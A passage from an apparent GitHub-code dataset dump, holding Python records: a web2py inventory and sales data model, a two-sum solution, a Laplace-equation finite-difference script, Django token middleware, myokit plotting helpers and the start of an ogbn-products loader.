MEMDB\n # from google.appengine.api.memcache import Client\n # session.connect(request, response, db = MEMDB(Client()))\n # ---------------------------------------------------------------------\n\n# -------------------------------------------------------------------------\n# by default give a view/generic.extension to all actions from localhost\n# none otherwise. a pattern can be 'controller/function.extension'\n# -------------------------------------------------------------------------\nresponse.generic_patterns = [] \nif request.is_local and not configuration.get('app.production'):\n response.generic_patterns.append('*')\n\n# -------------------------------------------------------------------------\n# choose a style for forms\n# -------------------------------------------------------------------------\nresponse.formstyle = 'bootstrap4_inline'\nresponse.form_label_separator = ''\n\n# -------------------------------------------------------------------------\n# (optional) optimize handling of static files\n# -------------------------------------------------------------------------\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n# -------------------------------------------------------------------------\n# (optional) static assets folder versioning\n# -------------------------------------------------------------------------\n# response.static_version = '0.0.0'\n\n# -------------------------------------------------------------------------\n# Here is sample code if you need for\n# - email capabilities\n# - authentication (registration, login, logout, ... )\n# - authorization (role based authorization)\n# - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n# - old style crud actions\n# (more options discussed in gluon/tools.py)\n# -------------------------------------------------------------------------\n\n# host names must be a list of allowed host names (glob syntax allowed)\nauth = Auth(db, host_names=configuration.get('host.names'))\n\n# -------------------------------------------------------------------------\n# create all tables needed by auth, maybe add a list of extra fields\n# -------------------------------------------------------------------------\nauth.settings.extra_fields['auth_user'] = []\nauth.define_tables(username=False, signature=False)\n\n# -------------------------------------------------------------------------\n# configure email\n# -------------------------------------------------------------------------\nmail = auth.settings.mailer\nmail.settings.server = 'logging' if request.is_local else configuration.get('smtp.server')\nmail.settings.sender = configuration.get('smtp.sender')\nmail.settings.login = configuration.get('smtp.login')\nmail.settings.tls = configuration.get('smtp.tls') or False\nmail.settings.ssl = configuration.get('smtp.ssl') or False\n\n# -------------------------------------------------------------------------\n# configure auth policy\n# -------------------------------------------------------------------------\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n# ------------------------------------------------------------------------- \n# read more at http://dev.w3.org/html5/markup/meta.name.html \n# -------------------------------------------------------------------------\nresponse.meta.author = configuration.get('app.author')\nresponse.meta.description = configuration.get('app.description')\nresponse.meta.keywords = configuration.get('app.keywords')\nresponse.meta.generator = configuration.get('app.generator')\nresponse.show_toolbar = configuration.get('app.toolbar')\n\n# -------------------------------------------------------------------------\n# your http://google.com/analytics id \n# -------------------------------------------------------------------------\nresponse.google_analytics_id = configuration.get('google.analytics_id')\n\n# -------------------------------------------------------------------------\n# maybe use the scheduler\n# -------------------------------------------------------------------------\nif configuration.get('scheduler.enabled'):\n from gluon.scheduler import Scheduler\n scheduler = Scheduler(db, heartbeat=configuration.get('scheduler.heartbeat'))\n\n# -------------------------------------------------------------------------\n# Define your tables below (or better in another model file) for example\n#\n# >>> db.define_table('mytable', Field('myfield', 'string'))\n#\n# Fields can be 'string','text','password','integer','double','boolean'\n# 'date','time','datetime','blob','upload', 'reference TABLENAME'\n# There is an implicit 'id integer autoincrement' field\n# Consult manual for more options, validators, etc.\n#\n# More API examples for controllers:\n#\n# >>> db.mytable.insert(myfield='value')\n# >>> rows = db(db.mytable.myfield == 'value').select(db.mytable.ALL)\n# >>> for row in rows: print row.id, row.myfield\n# -------------------------------------------------------------------------\n\n# -------------------------------------------------------------------------\n# after defining tables, uncomment below to enable auditing\n# -------------------------------------------------------------------------\n# auth.enable_record_versioning(db)\n\ndb.define_table('region',\n Field('region_name', 'string', length=80, unique=True),\n Field('alternate_name', 'string', length=80, unique=True),\n format='%(region_name)s')\n\ndb.region.region_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.region.region_name)]\ndb.region.alternate_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.region.alternate_name)]\n\ndb.define_table('branch',\n Field('branch_name', 'string', length=80, unique=True),\n Field('region_id', db.region, label='Region', notnull=True, ondelete='RESTRICT'),\n format='%(branch_name)s')\n\ndb.branch.branch_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.branch.branch_name)]\n\n# extending auth_user\n# auth.settings.extra_fields['auth_user'] = [\n# Field('branch_id', db.branch, label='Branch'), ]\n# auth.define_tables(username=False, signature=False)\n\n\ndb.define_table('warehouse',\n Field('warehouse_name', 'string', length=80, unique=True),\n Field('warehouse_code', 'string', length=20, unique=True),\n Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT'),\n format='%(warehouse_name)s')\n\ndb.warehouse.warehouse_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.warehouse.warehouse_name)]\ndb.warehouse.warehouse_code.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.warehouse.warehouse_code)]\n\ndb.define_table('container',\n Field('container_name', 'string', length=20, unique=True),\n Field('container_shortname', 'string', length=20, unique=True),\n Field('weight', 'decimal(8,2)'),\n format='%(container_shortname)s')\n\ndb.container.container_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.container.container_name)]\ndb.container.container_shortname.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.container.container_shortname)]\n\n\ndb.define_table('commodity',\n Field('commodity_name', 'string', length=80, unique=True),\n Field('is_cereal', 'boolean', default=True),\n format='%(commodity_name)s')\n\ndb.commodity.commodity_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.commodity.commodity_name)]\ndb.commodity.is_cereal.default = True\n\ndb.define_table('variety',\n Field('variety_name', 'string', length=20, unique=True),\n Field('commodity_id', db.commodity, label='Commodity', ondelete='RESTRICT'),\n format='%(variety_name)s')\n\n\ndb.variety.variety_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.variety.variety_name)]\n\n# db.define_table('item',\n# Field('item_name', 'string', length=80, unique=True),\n# Field('variety_id', db.variety, label='Variety'),\n# Field('container_id', db.container, label='Container'),\n# Field('selling_price', 'decimal(15,2)'),\n# format='%(item_name)s')\n\n# db.item.item_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.item.item_name)]\n\n\ndb.define_table('point_of_sale',\n Field('pos_name', 'string', length=80, unique=True, label='POS Name'),\n Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT' ),\n plural='Points of sales',\n format='%(pos_name)s')\n\ndb.point_of_sale.pos_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.point_of_sale.pos_name)]\ndb.point_of_sale.branch_id.requires = IS_IN_DB(db, db.branch.id, '%(branch_name)s', zero=None)\n\n\ndb.define_table('org_access',\n Field('auth_user_id', db.auth_user, label='User', unique=True, ondelete='RESTRICT'),\n Field('access_level', 'string', requires=IS_IN_SET(['Point of Sale', 'Branch', 'Region'], zero=None)),\n Field('pos_id', db.point_of_sale, label='Point of Sale', ondelete='RESTRICT'),\n Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT'),\n Field('region_id', db.region, label='Region', ondelete='RESTRICT'),\n )\ndb.org_access.auth_user_id.requires = IS_IN_DB(db, db.auth_user.id, '%(first_name)s %(last_name)s', _and=IS_NOT_EMPTY())\n\ndoc_stamp = db.Table(db, 'doc_stamp',\n Field('doc_date', 'date', default=request.now, requires=IS_DATE(format='%m/%d/%Y') ),\n Field('doc_number', 'string', length=40, unique=True))\n\ndb.define_table('AAP', \n Field('pos_id', db.point_of_sale, label='Point of Sale', ondelete='RESTRICT'),\n doc_stamp,\n Field('customer', 'string', length=80),\n # Field('item_id', db.item, label='Item'),\n Field('variety_id', db.variety, label='Variety', ondelete='RESTRICT'),\n Field('container_id', db.container, label='Container', ondelete='RESTRICT'),\n Field('bags', 'integer'),\n Field('net_kg_qty', 'decimal(15,3)', label='Net Kg or Quantity', represent = lambda v, r: '{:,}'.format(v) if v is not None else ''),\n Field('selling_price', 'decimal(15,2)'),\n Field('amount', 'decimal(15,2)', represent = lambda v, r: '{:,}'.format(v) if v is not None else ''),\n Field('check_no', 'string', length=40),\n Field('warehouse_id', db.warehouse, label='Warehouse', ondelete='RESTRICT'),\n Field('prepared_by', 'string', length=80, widget=lambda f, v: SQLFORM.widgets.text.widget(f, v, _rows=\"2\", _style=\"height: 100%;\")),\n Field('approved_by', 'string', length=80, widget=lambda f, v: SQLFORM.widgets.text.widget(f, v, _rows=\"2\", _style=\"height: 100%;\")),\n auth.signature, \n singular='AAP', plural='AAPs')\n\ndb.AAP.pos_id.requires = IS_IN_DB(db, db.point_of_sale.id, '%(pos_name)s', zero=None)\n# db.AAP.amount.represent = lambda v, r: DIV('{:,}'.format(v) if v is not None else '', _style='text-align: right; width=10px;')\n\ndb.define_table('client',\n Field('client_name', 'string', length=80, unique=True),\n )\n\ndb.define_table('user_location',\n Field('auth_user_id', db.auth_user, label='User', unique=True, ondelete='RESTRICT'),\n Field('region_id', db.region, label='Region', ondelete='RESTRICT'),\n Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT')\n )","repo_name":"jeffplata/nfabsm","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29471885183","text":"# 给定一个整数数组和一个目标值,找出数组中和为目标值的两个数。\n\n# 你可以假设每个输入只对应一种答案,且同样的元素不能被重复利用。\n\n# > 示例:\n\n# 给定 nums = [2, 7, 11, 15], target = 9\n\n# 因为 nums[0] + nums[1] = 2 + 7 = 9\n# 所以返回 [0, 1]\n\n# EASY\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n lookup = {} # lookup用于存储已经扫描过的列表,减少计算量\n for index, number in enumerate(nums): # enumerate获得带有索引的列表\n if target - number in lookup:\n return [lookup[target - number],index]\n lookup[number] = index # 查找[数字] = 索引\n print(\"lookup\",lookup)\n print(\"ij\",index,number)\n return []\n\n \nif __name__ == \"__main__\":\n\n numlist = [11,15,2,9,7]\n target = 9\n so = Solution()\n n = so.twoSum(numlist, target)\n print(\"结果: \", n)\n","repo_name":"YutingYao/YutingDB","sub_path":"PyLeetcode之断断续续在刷题/001twoSum.py","file_name":"001twoSum.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"28032409611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 26 22:31:00 2021\r\n\r\n@author: thesa\r\n\"\"\"\r\n## IMPORTS ##\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# FUNCTIONS #\r\n#Contour plot\r\ndef plot_contour(Phi, filename=None, zlabel=r\"potential $\\Phi$ (V)\",\r\n cmap=plt.cm.coolwarm):\r\n \"\"\"Plot Phi as a contour plot.\r\n \r\n Arguments\r\n ---------\r\n Phi : 2D array\r\n potential on lattice\r\n filename : string or None, optional (default: None)\r\n If `None` then show the figure and return the axes object.\r\n If a string is given (like \"contour.png\") it will only plot \r\n to the filename and close the figure but return the filename.\r\n cmap : colormap\r\n pick one from matplotlib.cm \r\n \"\"\"\r\n fig = plt.figure(figsize=(5,4))\r\n ax = fig.add_subplot(111)\r\n\r\n x = np.arange(Phi.shape[0])\r\n y = np.arange(Phi.shape[1])\r\n X, Y = np.meshgrid(x, y)\r\n Z = Phi[X, Y]\r\n cset = ax.contourf(X, Y, Z, 20, cmap=cmap)\r\n ax.set_xlabel('X')\r\n ax.set_ylabel('Y')\r\n ax.set_aspect(1)\r\n\r\n cb = fig.colorbar(cset, shrink=0.5, aspect=5)\r\n cb.set_label(zlabel)\r\n \r\n if filename:\r\n fig.savefig(filename)\r\n plt.close(fig)\r\n return filename\r\n else:\r\n return ax\r\n\r\n\r\n\r\n## INITIATIZING ARRAYS AND CONSTANTS ##\r\ngamma = 1.0 #float(input(\"Value for Gamma: \"))\r\n\r\ngammaSize = int(gamma *100+ 1)\r\n\r\n#Used for array sizes\r\nNmax = 100\r\nMmax = 100\r\n#Max_iter = 70\r\n\r\n#Indexes (These will constantly reset)\r\ni = 0\r\nj = 0\r\nk = 0\r\n\r\n# ARRAYS #\r\n#R-Diff tridiag matrix A_nn\r\nA_nn = np.zeros((Nmax, Nmax), dtype=np.float64)\r\n\r\n# WRITE DIAGONALS #\r\n#A_nn\r\n\r\nwhile i < Nmax: #Primary\r\n dr = 1/(i+1)\r\n A_nn[i,i] = -(2+1/(i+1)**2)/dr**2\r\n i += 1\r\ni = 0\r\n\r\n\r\nwhile i < Nmax-1: #Sub\r\n dr = 1/(i+1)\r\n A_nn[i+1,i] = (1-1/(2*(i+1)))/(dr**2)\r\n i += 1 \r\ni = 0\r\n\r\n#Super\r\nwhile i < Nmax-1:\r\n dr = 1/(i+1)\r\n A_nn[i,i+1] = (1+1/(2*(i+1)))/(dr**2)\r\n i += 1 \r\ni=0\r\nprint(\"#################HERE IS A_nn\\n\",A_nn,\"\\n#################\\n\") \r\n\r\n\r\n#Diagonal transform\r\nZ_nn, Z_nn = np.linalg.eig(A_nn) #Makes matrix for Z_nn\r\ninverseZ_nn = np.linalg.inv(Z_nn) #Z^(-1)\r\nE_nn= inverseZ_nn.dot(A_nn).dot(Z_nn) #Z^(-1).A.Z\r\neig = np.linalg.eig(A_nn)\r\ne_i = eig[0]\r\n\r\n\r\n#Z-Diff tridiag matrix B_mm\r\nB_mm = np.zeros((Mmax, Mmax), dtype=np.float64)\r\nwhile j < Mmax:\r\n dz = gamma / (j+1)\r\n B_mm[j,j] = -2/dz**2\r\n j += 1\r\nj = 0\r\nwhile j < Mmax-1:\r\n dz = gamma / (j+1)\r\n B_mm[j+1,j] = 1/dz**2\r\n j += 1\r\nj = 0\r\nwhile j < Mmax-1:\r\n dz = gamma / (j+1)\r\n B_mm[j,j+1] = 1/dz**2\r\n j += 1\r\n\r\nprint(\"#################HERE IS B_mm\\n\",B_mm,\"\\n#################\\n\") \r\n\r\n#RHS ARRAY F_nm\r\nF_nm = np.zeros((Nmax, Mmax), dtype=np.float64)\r\n \r\nwhile k <= Nmax -1:\r\n #F_nm[-1,k] = F_nm[-1,k] + 1/(Nmax-1)*k\r\n dz = gamma / (1)\r\n dr = 1/(k+1)\r\n \r\n F_nm [k,0] = F_nm [k,0] - dr*(1+k)/dz**2\r\n \r\n k+=1\r\nk = 0\r\n\r\n#H_mn array\r\nH_mn = np.transpose(F_nm).dot(np.transpose(inverseZ_nn))\r\n\r\n#Identiy of size m x m\r\nI_mm = np.identity(Mmax)\r\n\r\n#U_nm array\r\nU_nm = np.zeros((Nmax, Mmax), dtype=np.float64)\r\ni=0\r\nwhile i < Mmax-1:\r\n U_nm[i,:] = np.linalg.inv(B_mm + e_i[i]*I_mm).dot(H_mn[:,i])\r\n i += 1\r\n\r\n\r\n# BOUNDARY CONDITIONS #\r\n\r\n#0 conditions\r\n#v = np.zeros((Nmax, Mmax), dtype=np.float64)\r\n#v[0, :] = 0 #(0,0) -> (0,gamma) =0 /\\ (0,gamma) -> (1,gamma) = 0 /\\ (1,0) -> (1,gamma) =0 \r\nk = 0\r\n\r\n#NH Conditions\r\n#Loop sets the (0,0) -> (1,0) boundary condition\r\n#while k <= Mmax -1:\r\n# v[-1,k] = v[-1,k] + 1/(Nmax)*k\r\n\r\n # k+=1\r\n#k = 0 #reset indexing in case I need it\r\n#print(v)\r\nprint(F_nm)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#U_nm = rows of the solution (B_mm +eigenvalues I_mm)\r\n\r\n\r\n\r\n#v = Z_nn * U_nm\r\nv = Z_nn.dot(U_nm)\r\n\r\nprint(v)\r\n\r\n\r\n\r\nplot_contour(v)","repo_name":"Thesaxman1126/Online_Backup_of_my_PY_Files","sub_path":"462testing.py","file_name":"462testing.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10682557982","text":"\"\"\"\nDjango middlewares for the Azimuth auth package.\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport logging\n\nfrom dateutil import parser, tz\n\nfrom .settings import auth_settings\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseMiddleware:\n \"\"\"\n Base class for other Azimuth auth middlewares.\n\n Each middleware implements a particular method by which a token may be provided,\n e.g. bearer tokens or session data.\n \"\"\"\n def __init__(self, get_response):\n self.get_response = get_response\n\n def get_token(self, request):\n \"\"\"\n Get the current token from the request. May return null if no token is present.\n \"\"\"\n raise NotImplementedError\n\n def __call__(self, request):\n token = self.get_token(request)\n if token:\n request.META[auth_settings.DOWNSTREAM_TOKEN_HEADER] = token\n return self.get_response(request)\n\n\nclass BearerTokenMiddleware(BaseMiddleware):\n \"\"\"\n Middleware that reads token information from a bearer token.\n \"\"\"\n def get_token(self, request):\n header = request.META.get(auth_settings.BEARER_TOKEN_HEADER, \"\").strip()\n # If no prefix is configured, use an empty string\n # This means that startswith always returns true and removeprefix does nothing\n prefix = auth_settings.BEARER_TOKEN_PREFIX or \"\"\n if header and header.startswith(prefix):\n return header.removeprefix(prefix).strip()\n\n\nclass SessionTokenMiddleware(BaseMiddleware):\n \"\"\"\n Middleware that reads token information from the session.\n \"\"\"\n def get_token(self, request):\n token = request.session.get(auth_settings.TOKEN_SESSION_KEY, None)\n if token:\n token, expires = token\n # If expires is present, it should be an ISO-formatted string\n # If it is not present, the token is assumed to have no expiry\n if expires:\n now = datetime.now(tz.UTC)\n expires = parser.isoparse(expires)\n delta = timedelta(seconds = auth_settings.TOKEN_REFRESH_INTERVAL)\n # Try to refresh the token if it is within the delta of expiring but not already expired\n if now < expires < now + delta:\n logger.info('Attempting to refresh expiring token')\n try:\n token, expires = auth_settings.AUTHENTICATOR.refresh_token(token)\n except NotImplementedError:\n # If token refresh is not implemented, just ignore it\n logger.info('Authenticator does not support token refresh')\n except Exception:\n # Any other exception should be logged, but we still allow the\n # request to proceed\n logger.exception('Error occurred during token refresh')\n else:\n logger.info('Token refreshed successfully')\n # Store the refreshed token in the session\n request.session[auth_settings.TOKEN_SESSION_KEY] = token, expires\n elif now >= expires:\n logger.info('Token has already expired')\n else:\n logger.info('Token refresh not required yet')\n return token\n else:\n return None\n","repo_name":"cedadev/jasmin-azimuth","sub_path":"azimuth_auth/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11537781528","text":"import numpy as np\n# Don't import pyplot yet, this will cause a crash if no window environment\n# is loaded.\ndef simulation_times(time=None, realtime=None, evaluations=None, mode='stair',\n axes=None, nbuckets=50, label=None):\n \"\"\"\n Draws a graph of step sizes used during a simulation.\n\n Data can be passed in as ``time`` (simulation time) ``realtime``\n (benchmarked time during the simulation) and ``evaluations`` (the number\n of evaluations needed for each step). Which of these fields are required\n dependens on the chosen plot ``mode``:\n\n ``stair``\n Draws ``time`` on the x-axis, and the step number on the y-axis.\n In this plot, a high slope means the integrator is taking lots of\n steps.\n ``stair_inverse``\n Draws ``time`` on the y-axis, and the step number on the x-axis.\n ``load``\n Draws ``time`` on the x-axis, and log(1 / step size) on the y-axis.\n In this plot, high values on the y-axis should be found near difficult\n times on the x-axis\n ``histo``\n Lumps ``time`` into buckets (whose number can be specified using the\n argument ``nbuckets``) and counts the number of steps in each bucket.\n In the final result, the times corresponding to the buckets are plotted\n on the x axis and the number of evaluations in each bucket is plotted\n on the y axis.\n ``time_per_step``\n Uses the ``realtime`` argument to calculate the time taken to advance\n the solution each step.\n In the resulting plot, the step count is plotted on the x-axis, while\n the y-axis shows the time spent at this point.\n ``eval_per_step``\n Uses the ``evaluations`` entry to calculate the number of rhs\n evaluations required for each step.\n In the resulting plot, the step number is plotted on the x-axis, and\n the number of rhs evaluations for each step is plotted on the y-axis.\n\n The argument ``axes`` can be used to pass in a matplotlib axes object to be\n used for the plot. If none are given, the current axes obtained from\n ``pyplot.gca()`` are used.\n\n Returns a matplotlib axes object.\n \"\"\"\n import matplotlib.pyplot as pl\n if axes is None:\n axes = pl.gca()\n def stair(ax, time, realtime, evaluations):\n if time is None:\n raise ValueError('This plotting mode requires \"time\" to be set.')\n time = np.array(time, copy=False)\n step = np.arange(0, len(time))\n ax.step(time, step, label=label)\n def stair_inverse(ax, time, realtime, evaluations):\n if time is None:\n raise ValueError('This plotting mode requires \"time\" to be set.')\n time = np.array(time, copy=False)\n step = np.arange(0, len(time))\n ax.step(step, time, label=label)\n def load(ax, time, realtime, evaluations):\n if time is None:\n raise ValueError('This plotting mode requires \"time\" to be set.')\n time = np.array(time, copy=False)\n size = np.log(1.0 / (time[1:] - time[:-1]))\n ax.step(time[1:], size, label=label)\n def histo(ax, time, realtime, evaluations):\n if time is None:\n raise ValueError('This plotting mode requires \"time\" to be set.')\n time = np.array(time, copy=False)\n zero = float(time[0])\n bucket_w = (time[-1] - zero) / nbuckets\n bucket_m = bucket_w * 0.5\n bucket_x = np.zeros(nbuckets)\n bucket_y = np.zeros(nbuckets)\n hi = zero\n for k in xrange(nbuckets):\n lo = hi\n hi = zero + (k + 1) * bucket_w\n bucket_x[k] = lo\n bucket_y[k] = np.sum((lo < time)*(time <= hi))\n bucket_y[0] += 1 # First bucket contains point lo == time\n ax.step(bucket_x, bucket_y, where='post', label=label)\n def time_per_step(ax, time, realtime, evaluations):\n if realtime is None:\n raise ValueError('This plotting mode requires \"realtime\" to be'\n ' set.')\n real = np.array(realtime) # Will be manipulated\n real = real[1:] - real[:-1]\n step = np.arange(1, 1+len(real))\n ax.step(step, real, where='mid', label=label)\n def eval_per_step(ax, time, realtime, evaluations):\n if evaluations is None:\n raise ValueError('This plotting mode requires \"evaluations\" to be'\n ' set.')\n evls = np.array(evaluations) # Will be manipulated\n evls = evls[1:] - evls[:-1]\n step = np.arange(1, 1+len(evls))\n ax.step(step, evls, where='mid', label=label)\n modes = {\n 'stair' : stair,\n 'stair_inverse' : stair_inverse,\n 'load' : load,\n 'histo' : histo,\n 'time_per_step' : time_per_step,\n 'eval_per_step' : eval_per_step,\n }\n try:\n fn = modes[mode]\n except KeyError:\n raise ValueError('Selected mode not found. Avaiable modes are: '\n + ', '.join(['\"'+x+'\"' for x in modes.iterkeys()]))\n return fn(axes, time, realtime, evaluations)\ndef current_arrows(log, voltage, currents, axes=None):\n \"\"\"\n Draws a graph of voltage versus time with arrows to indicate which currents\n are active at which stage of the action potential.\n\n The argument, ``log`` should be a :class:`myokit.DataLog` containing\n the data needed for the plot. The argument ``voltage`` should be the key in\n ``log`` that maps to the membrane potential.\n\n The list ``currents`` should contain all keys of currents to display.\n\n Returns a matplotlib axes object.\n \"\"\"\n import matplotlib.pyplot as pl\n # Get currents, normalize with respect to total current at each time\n log = log.npview()\n traces = [log[x] for x in currents]\n times = log.time()\n memv = log[voltage]\n # Get sum of _absolute_ traces!\n I_total = np.zeros(len(traces[0]))\n for I in traces:\n I_total += abs(I)\n # Create axes\n ax = axes if axes is not None else pl.gca()\n # Plot membrane potential\n ax.plot(times, memv)\n ax.set_title(voltage)\n # Get width of time steps\n n = len(times)\n steps = np.concatenate((times[0:1], times, times[-1:]))\n steps = 0.5 * steps[2:] - 0.5 * steps[0:-2]\n # Find \"zero\" points, points of interest\n threshold_abs = 0.1\n threshold_int = 0\n for ii, I in enumerate(traces):\n # Capture parts where abs(I) is greather than the threshold and the\n # sign doesn't change\n parts = []\n indices = None\n sign = (I[0] >= 0)\n for k, i in enumerate(I):\n if abs(i) < threshold_abs or sign != (i >= 0):\n # Do nothing\n if indices is not None:\n parts.append(indices)\n indices = None\n else:\n # Store indices\n if indices is None:\n indices = []\n indices.append(k)\n sign = (i >= 0)\n if indices is not None:\n parts.append(indices)\n # For each part, calculate\n # the weighted midpoint in time\n # the total charge transferred\n # the average current\n # the peak current\n # the total charge transferred / the total sum charge transferred in\n # that same time. This last measure can be used as a secondary\n # threshold\n for part in parts:\n q_total = 0 # Sum of charge transferred\n t_total = 0 # Total time elapsed\n s_total = 0 # Sum of all currents in this time frame\n i_peak = 0 # Max absolute current\n t_mid = 0 # Weighted midpoint in time\n for k in part:\n t_total += steps[k]\n q_total += steps[k] * I[k]\n s_total += steps[k] * I_total[k]\n t_mid += steps[k] * I[k] * times[k]\n i_peak = max(i_peak, abs(I[k]))\n # Test if relative total transferred charge is above threshold\n if abs(q_total / s_total) < threshold_int:\n continue\n # Weighted midpoint in time (weight is height * width)\n t_mid /= q_total\n # Average charge transferred = total current transferred\n i_total = q_total / t_total\n # Average current\n i_mean = i_total / t_total\n # Add sign to peak current\n if sum(I) < 0: i_peak *= -1.0\n #if log is not None:\n # log.append('-- ' + currents[ii] + ' '\n # + '-'*(76-len(currents[ii])))\n # log.append('Transferred charge (abs) :', q_total)\n # log.append('Transferred charge (rel) :', q_total / s_total)\n # log.append('Start :', times[part[0]])\n # log.append('End :', times[part[-1]])\n # log.append('Duration :', t_total)\n # log.append('Midpoint :', t_mid)\n # log.append('Peak current :', i_peak)\n # log.append('Mean current :', i_mean)\n # log.append('Total current :', i_total)\n # Add arrow\n k = np.nonzero(times >= t_mid)[0][0]\n ars = 'rarrow'\n arx = t_mid\n if k + 1 == len(times):\n ary = memv[k]\n arr = 0\n else:\n t1 = times[k]\n t2 = times[k+1]\n ary = (memv[k]*(t2 - t_mid) + memv[k+1]*(t_mid - t1)) / (t2-t1)\n arr = np.arctan2(t1-t2, memv[k+1]-memv[k]) * 180 / np.pi\n if sum(I) > 0: arr += 180\n if abs(arr) > 90:\n arr = 180 + arr\n ars = 'larrow'\n bbox_props = dict(boxstyle=ars+',pad=0.3', fc='w', ec='black',lw=1)\n ax.annotate(currents[ii], xy=(arx, ary), ha='center', va='center',\n rotation=arr, size=14, bbox=bbox_props)\n return ax\ndef cumulative_current(log, currents, axes, labels=None, colors=None,\n integrate=False):\n \"\"\"\n Plots a number of currents, one on top of the other, with the positive and\n negative parts of the current plotted separately.\n \n The advantage of this type of plot is that it shows the relative size of\n each current versus the others, and gives an indication of the total\n positive and negative current in a model.\n \n Accepts the following arguments:\n \n ``log``\n A :class:`myokit.DataLog` containing all the data to plot.\n ``currents``\n A list of keys, where each key corresponds to a current stored in\n ``log``.\n ``axes``\n The matplotlib axes to create the plot on.\n ``labels``\n Can be used to pass in a list containing the label to set for each\n current.\n ``colors``\n Can be used to pass in a list containing the colors to set for each\n current.\n ``integrate``\n Set this to ``True`` to plot total carried charge instead of currents.\n\n The best results are obtained if relatively constant currents are specified\n early. Another rule of thumb is to specify the currents roughly in the\n order they appear during an AP. \n \"\"\"\n import matplotlib\n import matplotlib.pyplot as pl\n # Get numpy version of log\n log = log.npview()\n # Get time\n t = log.time()\n # Get currents or charges\n if integrate:\n signals = [log.integrate(c) for c in currents]\n else:\n signals = [log[c] for c in currents]\n # Colors\n n = len(currents)\n if colors:\n while len(colors) < n:\n colors.extend(colors)\n custom = colors[0:n]\n else:\n # Colormap\n cmap = matplotlib.cm.get_cmap(name='spectral')\n colors = [cmap(i) for i in np.linspace(0.9, 0.1, len(currents))]\n # Offsets\n op = on = 0\n # Plot\n for k, c in enumerate(currents):\n # Get color\n color = colors[k]\n # Get label\n if labels:\n label = labels[k]\n else:\n if integrate:\n label = 'Q(' + c[c.find('.')+1:] + ')'\n else:\n label = c[c.find('.')+1:]\n # Split signal\n s = signals[k]\n p = np.maximum(s, 0) + op\n n = np.minimum(s, 0) + on\n # Plot!\n axes.fill_between(t, p, op, facecolor=color)\n axes.fill_between(t, n, on, facecolor=color)\n axes.plot(t, p, color=color, label=label)\n axes.plot(t, p, color='k', lw=1)\n axes.plot(t, n, color='k', lw=1)\n on = n\n op = p\n","repo_name":"CardiacModelling/tailored-ipsc-models","sub_path":"myokit/lib/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":12506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35139551007","text":"from ogb.nodeproppred import PygNodePropPredDataset\nimport torch_geometric.transforms as T\nimport torch\nimport pandas as pd\nimport json\nimport numpy as np\nimport os\nimport time\nfrom core.utils import time_logger\n\nFILE = 'dataset/ogbn_products_orig/ogbn-products.csv'\n\n\n@time_logger\ndef _process():\n if os.path.isfile(FILE):\n return\n\n print(\"Processing raw text...\")\n ts = time.time()\n\n data = []\n files = ['dataset/ogbn_products/Amazon-3M.raw/trn.json',\n 'dataset/ogbn_products/Amazon-3M.raw/tst.json']\n for file in files:\n with open(file) as f:\n for line in f:\n data.append(json.loads(line))\n\n df = pd.DataFrame(data)\n df.set_index('uid', inplace=True)\n\n nodeidx2asin = pd.read_csv(\n 'dataset/ogbn_products/mapping/nodeidx2asin.csv.gz', compression='gzip')\n\n dataset = PygNodePropPredDataset(\n name='ogbn-products', transform=T.ToSparseTensor())\n graph = dataset[0]\n graph.n_id = np.arange(graph.num_nodes)\n graph.n_asin = nodeidx2asin.loc[graph.n_id]['asin'].values\n\n graph_df = df.loc[graph.n_asin]\n graph_df['nid'] = graph.n_id\n graph_df.reset_index(inplace=True)\n\n if not os.path.isdir('dataset/ogbn_products_orig'):\n os.mkdir('dataset/ogbn_products_orig')\n pd.DataFrame.to_csv(graph_df, FILE,\n index=False, columns=['uid', 'nid', 'title', 'content'])\n\n\ndef get_raw_text_products(use_text=False, seed=0):\n dataset = PygNodePropPredDataset(\n name='ogbn-products', transform=T.ToSparseTensor())\n data = dataset[0]\n\n idx_splits = dataset.get_idx_split()\n train_mask = torch.zeros(data.num_nodes).bool()\n val_mask = 